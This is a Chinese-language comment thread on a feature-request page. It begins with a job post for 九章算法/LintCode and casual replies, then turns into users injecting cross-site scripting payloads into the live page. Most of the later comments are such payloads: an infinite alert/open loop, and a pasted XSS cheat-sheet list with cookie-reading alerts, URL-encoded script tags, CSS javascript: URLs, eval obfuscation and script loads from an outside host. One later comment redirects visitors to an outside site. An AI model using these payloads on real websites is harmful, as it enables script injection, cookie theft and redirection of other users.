formulahendry/955.WLB

九章算法 / LintCode —— 杭州 / 远程

linghu-chong asked for this feature 3 months ago — 29 comments

linghu-chong commented 3 months ago

九章致力于打造互联网人的职场大学,由北京大学,武汉大学校友,前 Facebook, Airbnb 高级工程师联合创立。 加入请联系 hr@jiuzhang.com www.jiuzhang.com www.lintcode.com

| adjlyadv commented 3 months ago

upup

| helsonxiao commented 3 months ago

+1s

| JetRunner commented 3 months ago

线下995,不加班,良心公司 远程更是时薪算钱,时间自由不挤公交

| jonXue92 commented 3 months ago

+1s

formulahendry commented 3 months ago Admin

九章算法 和 LintCode 是啥关系?

| Linfanty commented 3 months ago

+1s

| linghu-chong commented 3 months ago

@formulahendry 同一个公司下的两个产品

| JetRunner commented 3 months ago

是955!955!955!上面手抖了(被老板diss了

Amberjay18 commented 3 months ago

还可以远程实习?谢谢

Amberjay18 commented 3 months ago

还可以远程实习?谢谢 毕业的可以远程兼职吗?

| JetRunner commented 3 months ago

@Amberjay18 可以!联系HR

PmcFizz commented 3 months ago

厉害

chenjigeng commented 3 months ago

test

chenjigeng commented 3 months ago

alert('网站有xss攻击,希望快点修复')

| citymaster commented 3 months ago

">

| citymaster commented 3 months ago

">

| citymaster commented 3 months ago

xcxyh commented 3 months ago

alert('12')

| alienmao commented 3 months ago

+1

mylamour commented 3 months ago

alert('还有完没完了,不要再XSS了')

leo66123 commented 3 months ago

while(1){if(alert('wtf'){open(‘ https://feathub.com/formulahendry/955.WLB/+160)})}

YuunYang commented 3 months ago

alert("????什么鬼")

16201320 commented 3 months ago

alert('hello,gaga!');

16201320 commented 3 months ago

alert('这就是xss攻击嘛,好像学会了个新东西');

16201320 commented 3 months ago

alert('hello,gaga!'); //经典语句,哈哈!

"'>

"'>alert('XSS')

"+alert('XSS')+"

'>alert(document.cookie)

='>alert(document.cookie)

alert(document.cookie)

alert(vulnerable)

alert('XSS')

%0a%0aalert(\"Vulnerable\").jsp

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

alert('Vulnerable')

a.jsp/alert('Vulnerable')

">alert('Vulnerable')

"";'>out

a=/XSS/alert(a.source)

@im\port'\ja\vasc\ript:alert("XSS")';

alert('XSS');

.XSS{background-image:url("javascript.:alert('XSS')");}

BODY{background:url("javascript.:alert('XSS')")}

getURL("javascript.:alert('XSS')")

a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);

"> function a(){alert('XSS');}<"

<IMG SRC="javascript.:alert('XSS')"

"SRC="http://xss.ha.ckers.org/a.js">

"SRC="http://xss.ha.ckers.org/a.js">

"''SRC="http://xss.ha.ckers.org/a.js">

'"SRC="http://xss.ha.ckers.org/a.js">

document.write("PTSRC="http://xss.ha.ckers.org/a.js">

link

inksmallfrog commented 3 months ago

{}"/>

wtf996 commented 2 months ago

window.location.href='https://www.qwq.wtf/?from=XSS';

wtf996 commented 2 months ago

window.alert = function(str){ return ; }

Join the discussion!

Sign-in with GitHub to comment